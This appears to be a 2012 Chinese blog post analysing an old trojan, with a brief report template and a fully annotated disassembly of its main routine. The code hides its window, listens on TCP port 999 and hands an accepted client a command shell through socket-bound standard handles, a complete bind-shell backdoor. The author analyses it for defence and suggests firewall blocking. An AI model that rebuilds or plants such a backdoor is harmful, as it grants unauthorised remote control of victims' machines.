mini木马分析

又是一个比较菜的木马分析,很久以前的木马,大家不要见笑。不积跬步无以至千里,我还是慢慢来呵呵。利用telnet可以远程登录
基本信息

  报告名称:mini木马分析                                                   
  作者:                                                           
  报告更新日期:                                           
  样本发现日期:        2012.09.11                                   
  样本类型:                                                   
  样本文件大小/被感染文件变化长度:   
  样本文件MD5 校验值:                            
  样本文件SHA1 校验值:                           
  壳信息:                                                       
  可能受到威胁的系统:                               
  相关漏洞:                                                   
  已知检测名称:                                           


简介
远程登录木马

网络症状

被监听的端口 999

详细分析/功能介绍
1.隐藏窗口
2.绑定999端口
3.监听等待客户端的连接请求
4.接受客户端的连接
5.远程登录

预防及修复措施
设置防火墙(阻止本机999端口的入站连接),关注杀软提示


; ----------------------------------------------------------------------
; int wmain(int argc, wchar_t **argv)   (argc/argv are never read here)
; Behaviour visible in this listing: a one-shot TCP bind shell.
;   1. ShowWindow(NULL, SW_HIDE)
;   2. WSAStartup, WSASocketW(AF_INET, SOCK_STREAM, IPPROTO_TCP)
;   3. bind to INADDR_ANY:999, listen(backlog 1), accept ONE client
;   4. CreateProcessW(%COMSPEC%) with stdin/stdout/stderr = the client socket
;   5. WaitForSingleObject(hProcess, INFINITE), then close handles/sockets
; Build traits: MSVC debug build (0xCC stack fill, j__RTC_* checks) with a
; /GS stack cookie. No Winsock/Win32 return value is checked anywhere, and
; there is no loop: after the shell exits the process simply returns 0.
; Observable artefacts for defenders: a listener on TCP 999 owned by this
; process, and a child cmd.exe (via %COMSPEC%) whose std handles are a socket.
; ----------------------------------------------------------------------
.text:00411410 wmain           proc near               ; CODE XREF: j_wmainj
.text:00411410
.text:00411410 var_504         = byte ptr -504h        ; start of the 0x504-byte frame (0xCC-filled below)
.text:00411410 CommandLine     = word ptr -440h        ; WCHAR buffer for %COMSPEC%; 0x208 bytes lie between it and StartupInfo
.text:00411410 StartupInfo     = _STARTUPINFOW ptr -238h ; STARTUPINFOW (cb = 0x44)
.text:00411410 Dst             = dword ptr -1ECh       ; PROCESS_INFORMATION; Dst itself is .hProcess
.text:00411410 hObject         = dword ptr -1E8h       ; PROCESS_INFORMATION.hThread (Dst + 4)
.text:00411410 addrlen         = dword ptr -1D4h       ; 0x10 = sizeof(sockaddr_in), in/out for accept()
.text:00411410 name            = sockaddr ptr -1C8h    ; listening address: AF_INET, port 999, INADDR_ANY
.text:00411410 var_1B0         = dword ptr -1B0h       ; accepted client socket
.text:00411410 s               = dword ptr -1A4h       ; listening socket
.text:00411410 WSAData         = WSAData ptr -198h     ; filled by WSAStartup, never read afterwards
.text:00411410 var_4           = dword ptr -4          ; /GS stack cookie (__security_cookie ^ ebp)
.text:00411410
.text:00411410                 push    ebp
.text:00411411                 mov     ebp, esp
.text:00411413                 sub     esp, 504h       ; frame for all locals above
.text:00411419                 push    ebx
.text:0041141A                 push    esi
.text:0041141B                 push    edi
.text:0041141C                 lea     edi, [ebp+var_504]
.text:00411422                 mov     ecx, 141h       ; 0x141 dwords = 0x504 bytes
.text:00411427                 mov     eax, 0CCCCCCCCh
.text:0041142C                 rep stosd               ; MSVC debug fill of uninitialised locals with 0xCC
.text:0041142E                 mov     eax, __security_cookie
.text:00411433                 xor     eax, ebp
.text:00411435                 mov     [ebp+var_4], eax ; /GS cookie stored; verified before ret
.text:00411438                 mov     esi, esp        ; esi = esp snapshot for the /RTCs esp-balance check after each call
隐藏窗口
.text:0041143A                 push    0               ; nCmdShow = SW_HIDE
.text:0041143C                 push    0               ; hWnd = NULL
.text:0041143E                 call    ds:__imp__ShowWindow@8 ; ShowWindow(NULL, SW_HIDE) — hWnd is NULL, so whether the console is really hidden is doubtful
初始化数据
.text:00411444                 cmp     esi, esp
.text:00411446                 call    j__RTC_CheckEsp; MSVC /RTCs check that esp was restored after the call (not a Unicode check)
.text:0041144B                 push    10h             ; Size = sizeof(PROCESS_INFORMATION)
.text:0041144D                 push    0               ; Val
.text:0041144F                 lea     eax, [ebp+Dst]
.text:00411455                 push    eax             ; Dst
.text:00411456                 call    j__memset       ; memset(&pi, 0, 0x10)
.text:0041145B                 add     esp, 0Ch
.text:0041145E                 push    44h             ; Size = sizeof(STARTUPINFOW)
.text:00411460                 push    0               ; Val
.text:00411462                 lea     eax, [ebp+StartupInfo]
.text:00411468                 push    eax             ; Dst
.text:00411469                 call    j__memset       ; memset(&si, 0, 0x44)
.text:0041146E                 add     esp, 0Ch
.text:00411471                 push    0FFh            ; Size = 0xFF bytes (only the first 0xFF bytes of CommandLine are zeroed)
.text:00411476                 push    0               ; Val
.text:00411478                 lea     eax, [ebp+CommandLine]
.text:0041147E                 push    eax             ; Dst
.text:0041147F                 call    j__memset
.text:00411484                 add     esp, 0Ch
.text:00411487                 mov     esi, esp
.text:00411489                 push    1FEh            ; nSize = 0x1FE WCHARs — larger than the 0x208 bytes (0x104 WCHARs) between CommandLine and StartupInfo; a long value would overrun into StartupInfo
.text:0041148E                 lea     eax, [ebp+CommandLine]
.text:00411494                 push    eax             ; lpBuffer
.text:00411495                 push    offset Name     ; lpName — presumably L"COMSPEC" per the note below; the string itself is not in this listing
COMSPEC 变量表示为: COMSPEC=C:\COMMAND.COM 获取命令行路径
.text:0041149A                 call    ds:__imp__GetEnvironmentVariableW@12 ; GetEnvironmentVariableW(Name, CommandLine, 0x1FE): path of the command interpreter lands in CommandLine
.text:004114A0                 cmp     esi, esp
.text:004114A2                 call    j__RTC_CheckEsp
.text:004114A7                 mov     esi, esp
.text:004114A9                 lea     eax, [ebp+WSAData]
套接字编程的初始化
.text:004114AF                 push    eax             ; lpWSAData
.text:004114B0                 push    202h            ; wVersionRequested = 2.2
.text:004114B5                 call    ds:__imp__WSAStartup@8 ; WSAStartup(0x202, &WSAData); result ignored
.text:004114BB                 cmp     esi, esp
.text:004114BD                 call    j__RTC_CheckEsp
.text:004114C2                 mov     esi, esp
创建套接字
.text:004114C4                 push    0               ; dwFlags = 0 (no WSA_FLAG_OVERLAPPED, so the handle can serve as a child's std handle)
.text:004114C6                 push    0               ; g
.text:004114C8                 push    0               ; lpProtocolInfo
.text:004114CA                 push    6               ; protocol = IPPROTO_TCP
.text:004114CC                 push    1               ; type = SOCK_STREAM
.text:004114CE                 push    2               ; af = AF_INET
.text:004114D0                 call    ds:__imp__WSASocketW@24 ; WSASocketW(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0)
.text:004114D6                 cmp     esi, esp
.text:004114D8                 call    j__RTC_CheckEsp
.text:004114DD                 mov     [ebp+s], eax    ; s = listening socket (INVALID_SOCKET is never checked)
.text:004114E3                 mov     eax, 2
.text:004114E8                 mov     [ebp+name.sa_family], ax ; sin_family = AF_INET
.text:004114EF                 mov     dword ptr [ebp+name.sa_data+2], 0 ; sin_addr = INADDR_ANY: listens on every interface
.text:004114F9                 mov     esi, esp
.text:004114FB                 push    999             ; hostshort = 999 (host byte order)
.text:00411500                 call    ds:__imp__htons@4 ; htons(999)
.text:00411506                 cmp     esi, esp
.text:00411508                 call    j__RTC_CheckEsp
.text:0041150D                 mov     word ptr [ebp+name.sa_data], ax ; sin_port = htons(999)
.text:00411514                 mov     esi, esp
绑定端口999
.text:00411516                 push    10h             ; namelen = sizeof(sockaddr_in)
.text:00411518                 lea     eax, [ebp+name]
.text:0041151E                 push    eax             ; name
.text:0041151F                 mov     ecx, [ebp+s]
.text:00411525                 push    ecx             ; s
.text:00411526                 call    ds:__imp__bind@12 ; bind(s, &name, 16); return value discarded (e.g. port already in use)
.text:0041152C                 cmp     esi, esp
.text:0041152E                 call    j__RTC_CheckEsp
.text:00411533                 mov     esi, esp
监听
.text:00411535                 push    1               ; backlog = 1
.text:00411537                 mov     eax, [ebp+s]
.text:0041153D                 push    eax             ; s
.text:0041153E                 call    ds:__imp__listen@8 ; listen(s, 1); return value discarded
.text:00411544                 cmp     esi, esp
.text:00411546                 call    j__RTC_CheckEsp
.text:0041154B                 mov     [ebp+addrlen], 10h ; in/out length for accept()
.text:00411555                 mov     esi, esp
连接远程服务器
.text:00411557                 lea     eax, [ebp+addrlen]
.text:0041155D                 push    eax             ; addrlen
.text:0041155E                 lea     ecx, [ebp+name] ; peer address is written over the listening sockaddr
.text:00411564                 push    ecx             ; addr
.text:00411565                 mov     edx, [ebp+s]
.text:0041156B                 push    edx             ; s
.text:0041156C                 call    ds:__imp__accept@12 ; accept(s, &name, &addrlen): blocks for ONE inbound client — bind shell, it never connects out
.text:00411572                 cmp     esi, esp
.text:00411574                 call    j__RTC_CheckEsp
.text:00411579                 mov     [ebp+var_1B0], eax ; var_1B0 = client socket (INVALID_SOCKET is never checked)
.text:0041157F                 mov     [ebp+StartupInfo.cb], 44h ; cb = sizeof(STARTUPINFOW)
.text:00411589                 xor     eax, eax
.text:0041158B                 mov     [ebp+StartupInfo.wShowWindow], ax ; wShowWindow = SW_HIDE
.text:00411592                 mov     [ebp+StartupInfo.dwFlags], 101h ; STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES
.text:0041159C                 mov     eax, [ebp+var_1B0]
.text:004115A2                 mov     [ebp+StartupInfo.hStdError], eax ; child's stdin/stdout/stderr all point at the client socket
.text:004115A8                 mov     eax, [ebp+var_1B0]
.text:004115AE                 mov     [ebp+StartupInfo.hStdInput], eax
.text:004115B4                 mov     eax, [ebp+var_1B0]
.text:004115BA                 mov     [ebp+StartupInfo.hStdOutput], eax
.text:004115C0                 mov     esi, esp
.text:004115C2                 lea     eax, [ebp+Dst]
.text:004115C8                 push    eax             ; lpProcessInformation
.text:004115C9                 lea     ecx, [ebp+StartupInfo]
创建进程 打开命令行 命令行的输入输出缓冲区为 已套接字
.text:004115CF                 push    ecx             ; lpStartupInfo
.text:004115D0                 push    0               ; lpCurrentDirectory
.text:004115D2                 push    0               ; lpEnvironment
.text:004115D4                 push    0               ; dwCreationFlags
.text:004115D6                 push    1               ; bInheritHandles = TRUE (needed so the socket std handles reach the child)
.text:004115D8                 push    0               ; lpThreadAttributes
.text:004115DA                 push    0               ; lpProcessAttributes
.text:004115DC                 lea     edx, [ebp+CommandLine]
.text:004115E2                 push    edx             ; lpCommandLine = %COMSPEC% as read above
.text:004115E3                 push    0               ; lpApplicationName
.text:004115E5                 call    ds:__imp__CreateProcessW@40 ; CreateProcessW(NULL, CommandLine, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi); result ignored
.text:004115EB                 cmp     esi, esp        ;
.text:004115ED                 call    j__RTC_CheckEsp
.text:004115F2                 mov     esi, esp
等待进程创建完毕
.text:004115F4                 push    0FFFFFFFFh      ; dwMilliseconds = INFINITE
.text:004115F6                 mov     eax, [ebp+Dst]
.text:004115FC                 push    eax             ; hHandle = pi.hProcess
.text:004115FD                 call    ds:__imp__WaitForSingleObject@8 ; WaitForSingleObject(pi.hProcess, INFINITE): blocks until the shell exits; no loop, so a single session
.text:00411603                 cmp     esi, esp        ;
.text:00411605                 call    j__RTC_CheckEsp
.text:0041160A                 mov     esi, esp
.text:0041160C                 mov     eax, [ebp+Dst]
.text:00411612                 push    eax             ; hObject = pi.hProcess
.text:00411613                 call    ds:__imp__CloseHandle@4 ; CloseHandle(pi.hProcess)
.text:00411619                 cmp     esi, esp
.text:0041161B                 call    j__RTC_CheckEsp
.text:00411620                 mov     esi, esp
.text:00411622                 mov     eax, [ebp+hObject]
.text:00411628                 push    eax             ; hObject = pi.hThread
.text:00411629                 call    ds:__imp__CloseHandle@4 ; CloseHandle(pi.hThread)
.text:0041162F                 cmp     esi, esp
.text:00411631                 call    j__RTC_CheckEsp
.text:00411636                 mov     esi, esp        ; both process handles closed
.text:00411638                 mov     eax, [ebp+s]
.text:0041163E                 push    eax             ; s = listening socket
.text:0041163F                 call    ds:__imp__closesocket@4 ; closesocket(listening socket)
.text:00411645                 cmp     esi, esp
.text:00411647                 call    j__RTC_CheckEsp
.text:0041164C                 mov     esi, esp
.text:0041164E                 mov     eax, [ebp+var_1B0]
.text:00411654                 push    eax             ; s = client socket
.text:00411655                 call    ds:__imp__closesocket@4 ; closesocket(client socket)
.text:0041165B                 cmp     esi, esp
.text:0041165D                 call    j__RTC_CheckEsp
.text:00411662                 mov     esi, esp
.text:00411664                 call    ds:__imp__WSACleanup@0 ; WSACleanup()
.text:0041166A                 cmp     esi, esp
.text:0041166C                 call    j__RTC_CheckEsp ; sockets closed, Winsock torn down
.text:00411671                 xor     eax, eax        ; return value 0 (saved/restored around the RTC call below)
.text:00411673                 push    edx
.text:00411674                 mov     ecx, ebp
.text:00411676                 push    eax
.text:00411677                 lea     edx, dword_4116A4 ; presumably the /RTCs descriptor of local arrays for the overrun check
.text:0041167D                 call    j__RTC_CheckStackVars
.text:00411682                 pop     eax
.text:00411683                 pop     edx
.text:00411684                 pop     edi
.text:00411685                 pop     esi
.text:00411686                 pop     ebx
.text:00411687                 mov     ecx, [ebp+var_4]
.text:0041168A                 xor     ecx, ebp
.text:0041168C                 call    j___security_check_cookie ; /GS cookie verification
.text:00411691                 add     esp, 504h
.text:00411697                 cmp     ebp, esp
.text:00411699                 call    j__RTC_CheckEsp
.text:0041169E                 mov     esp, ebp
.text:004116A0                 pop     ebp
.text:004116A1                 retn
.text:004116A1 wmain           endp
.text:004116A1

 

posted @ 2012-09-12 20:02  麦小扣_刘